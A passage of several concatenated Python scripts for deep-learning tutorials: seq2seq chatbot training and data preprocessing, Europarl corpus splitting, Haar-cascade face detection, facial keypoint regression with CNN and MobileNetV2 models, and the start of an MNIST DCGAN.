    tokenized = tokenize([text], tokenizer=y_tk)[0]
    # print("tokenized:", tokenized)
    X = to_categorical(pad(tokenized, length=37), num_classes=num_encoder_tokens)
    # print(X)
    sequence = predict_sequence(enc, dec, X, 206, num_decoder_tokens, char_level=True)
    # print(sequence)
    result = logits_to_text(sequence)
    print(result)
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
# word-level chatbot training; questions and answers share one tokenizer
text_gen = NMTGenerator(source_file="data/questions",
                        target_file="data/answers",
                        batch_size=32,
                        same_tokenizer=True,
                        verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
# pretrained word-embedding matrix aligned to the shared tokenizer
embedding_vectors = get_embedding_vectors(tokenizer)
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
# one vocabulary size used for both encoder and decoder
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 300
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_matrix=embedding_vectors)
model.summary()
enc.summary()
dec.summary()
# the standalone encoder/decoder are only needed at inference time
del enc
del dec
print("[+] Models created.")
model.compile(optimizer="rmsprop", loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
# checkpoint after every epoch (save_best_only=False keeps every snapshot)
checkpointer = ModelCheckpoint("results/chatbot_v13_{val_loss:.3f}_{val_acc:.3f}.h5", save_best_only=False, verbose=1)
# resume from a previous snapshot
model.load_weights("results/chatbot_v13_4.806_0.219.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
                    validation_data=text_gen.next_validation(),
                    verbose=1,
                    steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size),
                    validation_steps=(len(text_gen.X_test) // text_gen.batch_size),
                    callbacks=[checkpointer],
                    epochs=5)
print("[+] Model trained.")
model.save_weights("results/chatbot_v13.h5")
print("[+] Model saved.")
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
# character-level chatbot training; one shared character tokenizer
text_gen = NMTGenerator(source_file="data/questions",
                        target_file="data/answers",
                        batch_size=256,
                        same_tokenizer=True,
                        char_level=True,
                        verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
# single vocabulary size shared by encoder and decoder
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 384
# no embedding layer: characters are fed one-hot
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_layer=False)
model.summary()
enc.summary()
dec.summary()
# the standalone encoder/decoder are only needed at inference time
del enc
del dec
print("[+] Models created.")
model.compile(optimizer=AdaBound(lr=1e-3, final_lr=0.1), loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
checkpointer = ModelCheckpoint("results/chatbot_charlevel_v2_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=False, verbose=1)
# resume training from the latest snapshot
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
# model.fit([X1, X2], y,
# +1 on the step counts so the last partial batch is not dropped
model.fit_generator(text_gen.next_train(),
                    validation_data=text_gen.next_validation(),
                    verbose=1,
                    steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size)+1,
                    validation_steps=(len(text_gen.X_test) // text_gen.batch_size)+1,
                    callbacks=[checkpointer],
                    epochs=50)
print("[+] Model trained.")
model.save_weights("results/chatbot_charlevel_v2.h5")
print("[+] Model saved.")
import tqdm
X, y = [], []
# the combined europarl file stores one language's lines first, then the
# other's; split it into two parallel files by line index
with open("data/fr-en", encoding='utf8') as f:
    for i, line in tqdm.tqdm(enumerate(f), "Reading file"):
        if "europarl-v7" in line:
            continue
        # X.append(line)
        # if i == 2007723 or i == 2007724 or i == 2007725
        # lines up to 2007722 are English, the rest French
        if i <= 2007722:
            X.append(line.strip())
        else:
            y.append(line.strip())
# drop the last French line — presumably to keep the two halves the same
# length; NOTE(review): verify against the source corpus
y.pop(-1)
with open("data/en", "w", encoding='utf8') as f:
    for i in tqdm.tqdm(X, "Writing english"):
        print(i, file=f)
with open("data/fr", "w", encoding='utf8') as f:
    for i in tqdm.tqdm(y, "Writing french"):
        print(i, file=f)
import glob
import tqdm
import os
import random
import inflect
# inflect engine spells out digit strings (e.g. "42" -> "forty-two")
p = inflect.engine()
X, y = [], []
# tokens that must survive the vocabulary filter in map_text: interjections,
# punctuation, and the dataset's special _func_val_* action placeholders
special_words = {
    "haha", "rockikz", "fullclip", "xanthoss", "aw", "wow", "ah", "oh", "god", "quran", "allah",
    "muslims", "muslim", "islam", "?", ".", ",",
    '_func_val_get_callme_para1_comma0', '_num2_', '_func_val_get_last_question', '_num1_',
    '_func_val_get_number_plus_para1__num1__para2__num2_',
    '_func_val_update_call_me_enforced_para1__callme_',
    '_func_val_get_number_minus_para1__num2__para2__num1_', '_func_val_get_weekday_para1_d0',
    '_func_val_update_user_name_para1__name_', '_callme_', '_func_val_execute_pending_action_and_reply_para1_no',
    '_func_val_clear_user_name_and_call_me', '_func_val_get_story_name_para1_the_velveteen_rabbit', '_ignored_',
    '_func_val_get_number_divide_para1__num1__para2__num2_', '_func_val_get_joke_anyQ:',
    '_func_val_update_user_name_and_call_me_para1__name__para2__callme_', '_func_val_get_number_divide_para1__num2__para2__num1_Q:',
    '_name_', '_func_val_ask_name_if_not_yet', '_func_val_get_last_answer', '_func_val_continue_last_topic',
    '_func_val_get_weekday_para1_d1', '_func_val_get_number_minus_para1__num1__para2__num2_', '_func_val_get_joke_any',
    '_func_val_get_story_name_para1_the_three_little_pigs', '_func_val_update_call_me_para1__callme_',
    '_func_val_get_story_name_para1_snow_white', '_func_val_get_today', '_func_val_get_number_multiply_para1__num1__para2__num2_',
    '_func_val_update_user_name_enforced_para1__name_', '_func_val_get_weekday_para1_d_2', '_func_val_correct_user_name_para1__name_',
    '_func_val_get_time', '_func_val_get_number_divide_para1__num2__para2__num1_', '_func_val_get_story_any',
    '_func_val_execute_pending_action_and_reply_para1_yes', '_func_val_get_weekday_para1_d_1', '_func_val_get_weekday_para1_d2'
}
# reference English vocabulary, one word per line
english_words = { word.strip() for word in open("data/words8.txt") }
# vocabulary covered by the pretrained GloVe embeddings (first token per line)
embedding_words = set()
f = open("data/glove.6B.300d.txt", encoding='utf8')
for line in tqdm.tqdm(f, "Reading GloVe words"):
    values = line.split()
    word = values[0]
    embedding_words.add(word)
# "key => value" replacement rules, applied before the vocabulary checks
maps = open("data/maps.txt").readlines()
word_mapper = {}
for map in maps:
    key, value = map.split("=>")
    key = key.strip()
    value = value.strip()
    print(f"Mapping {key} to {value}")
    word_mapper[key.lower()] = value
# counters reported after writing each output file (reset in between)
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
def map_text(line):
    """
    Normalize one line of text to the model vocabulary.

    Each word is lower-cased and replaced by, in priority order: its
    spelled-out form if it is a number, its replacement from data/maps.txt,
    itself if it is a known English or special token, or "_unk_" otherwise.
    The module-level counters record which branch each word took.

    :param line: whitespace-separated text
    :return: the normalized line as one space-joined string
    """
    global unks
    global digits
    global mapped
    global english
    global special
    result = []
    # local alias avoids repeated attribute lookups inside the loop
    append = result.append
    words = line.split()
    for word in words:
        word = word.lower()
        # numbers are spelled out, e.g. "42" -> "forty-two"
        if word.isdigit():
            append(p.number_to_words(word))
            digits += 1
            continue
        # explicit replacement rules take precedence over the vocabularies
        if word in word_mapper:
            append(word_mapper[word])
            mapped += 1
            continue
        if word in english_words:
            append(word)
            english += 1
            continue
        if word in special_words:
            append(word)
            special += 1
            continue
        # out-of-vocabulary word
        append("_unk_")
        unks += 1
    return ' '.join(result)
# collect question/answer pairs from the augmented data files
for file in tqdm.tqdm(glob.glob("data/Augment*/*"), "Reading files"):
    with open(file, encoding='utf8') as f:
        for line in f:
            line = line.strip()
            if "Q: " in line:
                X.append(line)
            elif "A: " in line:
                y.append(line)
# shuffle X and y maintaining the order
combined = list(zip(X, y))
random.shuffle(combined)
X[:], y[:] = zip(*combined)

def _strip_prefix(line, prefix):
    """Remove a leading marker such as "Q: " exactly once.

    BUGFIX: the previous code used str.lstrip('Q: '), which strips a
    *character set* ('Q', ':', ' '), not a prefix — it also ate the first
    letters of lines starting with those characters (e.g. "Q: Quick" became
    "uick").  This removes only the literal prefix.
    """
    return line[len(prefix):] if line.startswith(prefix) else line

with open("data/questions", "w") as f:
    for line in tqdm.tqdm(X, "Writing questions"):
        line = _strip_prefix(line.strip(), 'Q: ')
        line = map_text(line)
        print(line, file=f)
# report how the vocabulary filter classified question words
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
# reset the counters before processing the answers
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
with open("data/answers", "w") as f:
    for line in tqdm.tqdm(y, "Writing answers"):
        line = _strip_prefix(line.strip(), 'A: ')
        line = map_text(line)
        print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
import numpy as np
import cv2
# loading the test image
image = cv2.imread("kids.jpg")
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# initialize the face recognizer (default face haar cascade)
# BUGFIX: the cascade file is named haarcascade_frontalface_default.xml
# ("frontal", not "fontal"); with the typo the classifier loaded empty and
# detectMultiScale failed.
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_frontalface_default.xml")
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
    cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
# save the image with rectangles
cv2.imwrite("kids_detected.jpg", image)
import numpy as np
import cv2
# create a new cam object
cap = cv2.VideoCapture(0)
# initialize the face recognizer (default face haar cascade)
# BUGFIX: the cascade file is named haarcascade_frontalface_default.xml
# ("frontal", not "fontal"); with the typo the classifier loaded empty and
# detectMultiScale failed.
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_frontalface_default.xml")
while True:
    # read the image from the cam
    _, image = cap.read()
    # converting to grayscale
    image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    # detect all the faces in the image
    faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
    # for every face, draw a blue rectangle
    for x, y, width, height in faces:
        cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
    cv2.imshow("image", image)
    # quit on 'q'
    if cv2.waitKey(1) == ord("q"):
        break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
from models import create_model
from parameters import *
from utils import normalize_image
def untransform(keypoints):
    """Map normalized keypoints back to pixel space (inverse of (k - 100) / 50)."""
    return (keypoints * 50) + 100
def get_single_prediction(model, image):
    """Run *model* on a single *image* and return keypoints shaped OUTPUT_SHAPE."""
    batch = image[np.newaxis, ...]  # add the batch axis the model expects
    prediction = model.predict(batch)[0]
    return prediction.reshape(*OUTPUT_SHAPE)
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
    """Show the image (grayscale) with predicted keypoints in magenta and,
    if given, ground-truth keypoints in green."""
    plt.imshow(np.squeeze(image), cmap="gray")
    for points, colour in ((predicted_keypoints, "m"), (true_keypoints, "g")):
        if points is None:
            continue
        scaled = untransform(points)
        plt.scatter(scaled[:, 0], scaled[:, 1], s=20, marker=".", c=colour)
    plt.show()
# read the input image path from the command line
image = cv2.imread(sys.argv[1])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# # construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1.h5")
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
# get all the faces in the image
faces = face_cascade.detectMultiScale(image, 1.2, 2)
# for each detected face: box it, crop it, normalize, predict, display
for (x, y, w, h) in faces:
    cv2.rectangle(image, (x, y), (x+w, y+h), (255, 0, 0), 3)
    face_image = image.copy()[y: y+h, x: x+w]
    face_image = normalize_image(face_image)
    keypoints = get_single_prediction(model, face_image)
    show_keypoints(face_image, keypoints)
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import cv2
from models import create_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data, resize_image, normalize_keypoints, normalize_image
def get_single_prediction(model, image):
    """Predict facial keypoints for one image; returns an OUTPUT_SHAPE array."""
    prediction = model.predict(np.array([image]))[0]
    return np.reshape(prediction, OUTPUT_SHAPE)
def get_predictions(model, X):
    """Predict keypoints for a batch *X*, reshaped to (n, *OUTPUT_SHAPE)."""
    return model.predict(X).reshape(-1, *OUTPUT_SHAPE)
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
    """Plot the image with predicted keypoints (magenta) and, when supplied,
    true keypoints (green); keypoints are de-normalized first."""
    pred = untransform(predicted_keypoints)
    plt.imshow(image, cmap="gray")
    plt.scatter(pred[:, 0], pred[:, 1], s=20, marker=".", c="m")
    if true_keypoints is not None:
        truth = untransform(true_keypoints)
        plt.scatter(truth[:, 0], truth[:, 1], s=20, marker=".", c="g")
    plt.show()
def show_keypoints_cv2(image, predicted_keypoints, true_keypoints=None):
    """
    Draw keypoints on *image* with OpenCV and return the image.

    Predicted keypoints are drawn in magenta, true keypoints (if given) in
    green.  BUGFIXES vs the original: cv2.circle takes a single (x, y)
    center, so true keypoints are drawn one by one instead of passing whole
    coordinate arrays; centers are cast to int; colors are proper BGR tuples
    (``color=2`` and ``color="green"`` were invalid).
    """
    for x, y in predicted_keypoints:
        image = cv2.circle(image, (int(x), int(y)), 2, color=(255, 0, 255))
    if true_keypoints is not None:
        for x, y in true_keypoints:
            image = cv2.circle(image, (int(x), int(y)), 2, color=(0, 255, 0))
    return image
def untransform(keypoints):
    """Scale keypoints from the normalized [0, 1] range back to 224-pixel space."""
    return 224 * keypoints
# construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_different-scaling.h5")
# X_test, y_test = load_data(testing_file)
# y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
cap = cv2.VideoCapture(0)
# live webcam loop: normalize each frame, predict keypoints, draw and show
while True:
    _, frame = cap.read()
    # make a copy of the original image
    image = frame.copy()
    image = normalize_image(image)
    keypoints = get_single_prediction(model, image)
    print(keypoints[0])
    # scale predictions back from the normalized range to pixel coordinates
    keypoints = untransform(keypoints)
    # w, h = frame.shape[:2]
    # keypoints = (keypoints * [frame.shape[0] / image.shape[0], frame.shape[1] / image.shape[1]]).astype("int16")
    # frame = show_keypoints_cv2(frame, keypoints)
    image = show_keypoints_cv2(image, keypoints)
    cv2.imshow("frame", image)
    # quit on 'q'
    if cv2.waitKey(1) == ord("q"):
        break
cv2.destroyAllWindows()
cap.release()
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.applications import MobileNetV2
import tensorflow as tf
import tensorflow.keras.backend as K
def smoothL1(y_true, y_pred):
    """Smooth-L1 (Huber) loss with delta 0.5: quadratic for small errors,
    linear for large ones; summed over all elements."""
    delta = 0.5
    abs_err = K.abs(y_true - y_pred)
    quadratic = 0.5 * abs_err ** 2
    linear = delta * (abs_err - 0.5 * delta)
    return K.sum(K.switch(abs_err < delta, quadratic, linear))
def create_model(input_shape, output_shape):
    """
    Build and compile a plain CNN that regresses keypoint coordinates from an
    image.

    Three convolutional blocks (32 -> 64 -> 128 filters, 5x5 kernels, each
    followed by 2x2 max-pooling) feed a 256-unit dense layer with dropout and
    a linear output layer.  Compiled with the smooth-L1 (Huber) loss.

    :param input_shape: input image shape, e.g. (224, 224, 1)
    :param output_shape: number of output values (num_keypoints * 2)
    :return: the compiled Keras model
    """
    # building the model
    model = Sequential()
    model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same", input_shape=input_shape))
    model.add(Activation("relu"))
    model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same"))
    model.add(Activation("relu"))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # model.add(Dropout(0.25))
    model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
    model.add(Activation("relu"))
    model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
    model.add(Activation("relu"))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # model.add(Dropout(0.25))
    model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
    model.add(Activation("relu"))
    model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
    model.add(Activation("relu"))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # model.add(Dropout(0.25))
    # model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
    # model.add(Activation("relu"))
    # model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
    # model.add(Activation("relu"))
    # model.add(MaxPooling2D(pool_size=(2, 2)))
    # # model.add(Dropout(0.25))
    # flattening the convolutions
    model.add(Flatten())
    # fully-connected layers
    model.add(Dense(256))
    model.add(Activation("relu"))
    model.add(Dropout(0.5))
    # linear output: raw coordinate regression
    model.add(Dense(output_shape, activation="linear"))
    # print the summary of the model architecture
    model.summary()
    # training the model using rmsprop optimizer
    # model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
    model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
    return model
def create_mobilenet_model(input_shape, output_shape):
    """
    Build a transfer-learning keypoint regressor on top of MobileNetV2.

    All layers except the last 4 are frozen, and a linear dense head is
    attached for coordinate regression.  Compiled with the smooth-L1 loss.

    :param input_shape: input image shape, e.g. (224, 224, 3)
    :param output_shape: number of output values (num_keypoints * 2)
    :return: the compiled Keras model
    """
    model = MobileNetV2(input_shape=input_shape)
    # remove the last layer
    # NOTE(review): layers.pop() only edits the layer list, not the graph;
    # the new head is attached to model.layers[-1].output after the pop,
    # which is presumably the intended attachment point — confirm.
    model.layers.pop()
    # freeze all the weights of the model except for the last 4 layers
    for layer in model.layers[:-4]:
        layer.trainable = False
    # construct our output dense layer
    output = Dense(output_shape, activation="linear")
    # connect it to the model
    output = output(model.layers[-1].output)
    model = Model(inputs=model.inputs, outputs=output)
    model.summary()
    # training the model using adam optimizer
    # model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
    model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
    return model
# shared configuration for the facial-keypoints scripts
IMAGE_SIZE = (224, 224)  # model input resolution (height, width)
OUTPUT_SHAPE = (68, 2)  # 68 facial keypoints, (x, y) per keypoint
BATCH_SIZE = 20
EPOCHS = 30
# CSV indexes: first column is the image file name, the rest are keypoints
training_file = "data/training_frames_keypoints.csv"
testing_file = "data/test_frames_keypoints.csv"
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
def get_predictions(model, X):
    """Run the model on batch *X* and reshape the flat outputs to one
    OUTPUT_SHAPE array per sample."""
    flat_predictions = model.predict(X)
    return flat_predictions.reshape((-1,) + tuple(OUTPUT_SHAPE))
def show_keypoints(image, predicted_keypoints, true_keypoints):
    """Overlay predicted (magenta) and ground-truth (green) keypoints on the
    image after de-normalizing both."""
    pred = untransform(predicted_keypoints)
    truth = untransform(true_keypoints)
    plt.imshow(np.squeeze(image), cmap="gray")
    plt.scatter(pred[:, 0], pred[:, 1], s=20, marker=".", c="m")
    plt.scatter(truth[:, 0], truth[:, 1], s=20, marker=".", c="g")
    plt.show()
def untransform(keypoints):
    """Undo the /224 normalization applied to keypoints in preprocessing."""
    scale = 224
    return keypoints * scale
# # construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_mobilenet_crop.h5")
X_test, y_test = load_data(testing_file)
y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
y_pred = get_predictions(model, X_test)
print(y_pred[0])
print(y_pred.shape)
print(y_test.shape)
print(X_test.shape)
# visually compare predictions vs ground truth on 50 test samples
for i in range(50):
    show_keypoints(X_test[i+400], y_pred[i+400], y_test[i+400])
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.preprocessing import MinMaxScaler
from tqdm import tqdm
# from tensorflow.keras.layers import Conv2D, Dense, MaxPooling2D
from tensorflow.keras.callbacks import TensorBoard, ModelCheckpoint
import os
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
# # read the training dataframe
# training_df = pd.read_csv("data/training_frames_keypoints.csv")
# # print the number of images available in the training dataset
# print("Number of images in training set:", training_df.shape[0])
def show_keypoints(image, key_points):
    """Display *image* and overlay its facial *key_points* as dots."""
    xs, ys = key_points[:, 0], key_points[:, 1]
    # show the image, then scatter the keypoints over it
    plt.imshow(image)
    plt.scatter(xs, ys, s=20, marker=".")
    plt.show()
# show an example image
# n = 124
# image_name = training_df.iloc[n, 0]
# keypoints = training_df.iloc[n, 1:].values.reshape(-1, 2)
# show_keypoints(mpimg.imread(os.path.join("data", "training", image_name)), key_points=keypoints)
model_name = "model_smoothl1_mobilenet_crop"
# construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
# model.load_weights("results/model3.h5")
# RGB (3-channel) inputs are kept for MobileNet, hence to_gray=False
X_train, y_train = load_data(training_file, to_gray=False)
X_test, y_test = load_data(testing_file, to_gray=False)
if not os.path.isdir("results"):
    os.mkdir("results")
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
# checkpoint = ModelCheckpoint(os.path.join("results", model_name), save_best_only=True, verbose=1)
history = model.fit(X_train, y_train,
                    batch_size=BATCH_SIZE,
                    epochs=EPOCHS,
                    validation_data=(X_test, y_test),
                    # callbacks=[tensorboard, checkpoint],
                    callbacks=[tensorboard],
                    verbose=1)
# save the final weights (checkpointing above is disabled)
model.save("results/" + model_name + ".h5")
import numpy as np
import pandas as pd
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import cv2
from tqdm import tqdm
import os
from parameters import IMAGE_SIZE, OUTPUT_SHAPE
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
    """Plot the image in grayscale with predicted keypoints (magenta) and
    optional true keypoints (green); coordinates are used as-is."""
    plt.imshow(image, cmap="gray")
    overlays = [(predicted_keypoints, "m")]
    if true_keypoints is not None:
        overlays.append((true_keypoints, "g"))
    for pts, colour in overlays:
        plt.scatter(pts[:, 0], pts[:, 1], s=20, marker=".", c=colour)
    plt.show()
def resize_image(image, image_size):
    """Resize *image* to *image_size* (width, height) using OpenCV."""
    resized = cv2.resize(image, image_size)
    return resized
def random_crop(image, keypoints):
    """
    Take a random IMAGE_SIZE crop of *image* and shift *keypoints* to match.

    Keypoints are reshaped to (-1, 2).  When the image is not strictly larger
    than IMAGE_SIZE in both dimensions, np.random.randint raises ValueError
    and the image is returned uncropped (keypoints still reshaped).
    """
    height, width = image.shape[:2]
    crop_h, crop_w = IMAGE_SIZE
    keypoints = keypoints.reshape(-1, 2)
    try:
        top = np.random.randint(0, height - crop_h)
        left = np.random.randint(0, width - crop_w)
    except ValueError:
        # image too small to crop — fall back to the full image
        return image, keypoints
    cropped = image[top: top + crop_h, left: left + crop_w]
    return cropped, keypoints - [left, top]
def normalize_image(image, to_gray=True):
    """
    Resize an RGB(A) image to IMAGE_SIZE and scale pixels to [0, 1].

    When *to_gray* is true the image is converted to grayscale and given a
    trailing channel axis, producing shape (H, W, 1).
    """
    # drop the alpha (opacity) channel if present
    if image.shape[2] == 4:
        image = image[:, :, :3]
    target_h, target_w = (int(d) for d in IMAGE_SIZE)
    # scale the image to the model input size (cv2 takes (width, height))
    image = resize_image(image, (target_w, target_h))
    if to_gray:
        image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
    # pixels from [0, 255] to [0, 1]
    image = image / 255.0
    if to_gray:
        # restore the channel axis lost by the grayscale conversion
        image = np.expand_dims(image, axis=2)
    return image
def normalize_keypoints(image, keypoints):
    """
    Rescale keypoints from the original *image* size to IMAGE_SIZE, then
    divide by 224 to bring them to roughly [0, 1] (experimental scaling).

    :return: a flat vector (x0, y0, x1, y1, ...)
    """
    orig_h, orig_w = image.shape[:2]
    target_h, target_w = (int(d) for d in IMAGE_SIZE)
    # reshape the flat (136,) vector to (68, 2) coordinates and rescale
    scaled = keypoints.reshape(-1, 2) * [target_w / orig_w, target_h / orig_h]
    # keypoints = (keypoints - 100) / 50  # alternative normalization
    return scaled.reshape(-1) / 224
def normalize(image, keypoints, to_gray=True):
    """Random-crop the sample, then normalize both the image and its keypoints."""
    cropped, shifted = random_crop(image, keypoints)
    return normalize_image(cropped, to_gray=to_gray), normalize_keypoints(cropped, shifted)
def load_data(csv_file, to_gray=True):
    """
    Load a keypoints CSV (first column: image file name; remaining columns:
    flattened keypoint coordinates) and return normalized arrays.

    NOTE(review): images are always read from data/training, even for the
    test CSV — confirm this is intentional.  X is always allocated with 3
    channels; when to_gray is true the (H, W, 1) grayscale image broadcasts
    across them on assignment.

    :param csv_file: path to the CSV index
    :param to_gray: forwarded to normalize(); convert images to grayscale
    :return: (X, y) with X of shape (n, *IMAGE_SIZE, 3) float32 and
             y of shape (n, 136) normalized keypoints
    """
    # read the training dataframe
    df = pd.read_csv(csv_file)
    all_keypoints = np.array(df.iloc[:, 1:])
    image_names = list(df.iloc[:, 0])
    # load images
    X, y = [], []
    X = np.zeros((len(image_names), *IMAGE_SIZE, 3), dtype="float32")
    y = np.zeros((len(image_names), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1]))
    for i, (image_name, keypoints) in enumerate(zip(tqdm(image_names, "Loading " + os.path.basename(csv_file)), all_keypoints)):
        image = mpimg.imread(os.path.join("data", "training", image_name))
        image, keypoints = normalize(image, keypoints, to_gray=to_gray)
        X[i] = image
        y[i] = keypoints
    return X, y
"""
DCGAN on MNIST using Keras
"""
# to use CPU
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import numpy as np
import matplotlib.pyplot as plt
import tqdm
import glob
# from tensorflow.examples.tutorials.mnist import input_data
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten, Reshape
from keras.layers import Conv2D, Conv2DTranspose, UpSampling2D
from keras.layers import LeakyReLU, Dropout, BatchNormalization
from keras.optimizers import Adam, RMSprop
from keras.datasets import mnist
class GAN:
    """DCGAN building blocks for 28x28x1 (MNIST) images.

    Holds the discriminator and generator networks plus the two compiled
    training models: DM (discriminator alone) and AM (generator followed by
    discriminator).  All four are built lazily and cached on first access.
    """
    def __init__(self, img_x=28, img_y=28, img_z=1):
        # image dimensions: width, height, channels
        self.img_x = img_x
        self.img_y = img_y
        self.img_z = img_z
        self.D = None   # discriminator
        self.G = None   # generator
        self.AM = None  # adversarial model
        self.DM = None  # discriminator model
    def discriminator(self):
        """Build (once) and return the discriminator: four conv blocks with
        LeakyReLU and dropout, ending in a sigmoid real/fake probability."""
        if self.D:
            return self.D
        self.D = Sequential()
        depth = 64
        dropout = 0.4
        input_shape = (self.img_x, self.img_y, self.img_z)
        self.D.add(Conv2D(depth, 5, strides=2, input_shape=input_shape, padding="same"))
        self.D.add(LeakyReLU(0.2))
        self.D.add(Dropout(dropout))
        self.D.add(Conv2D(depth*2, 5, strides=2, padding="same"))
        self.D.add(LeakyReLU(0.2))
        self.D.add(Dropout(dropout))
        self.D.add(Conv2D(depth*4, 5, strides=2, padding="same"))
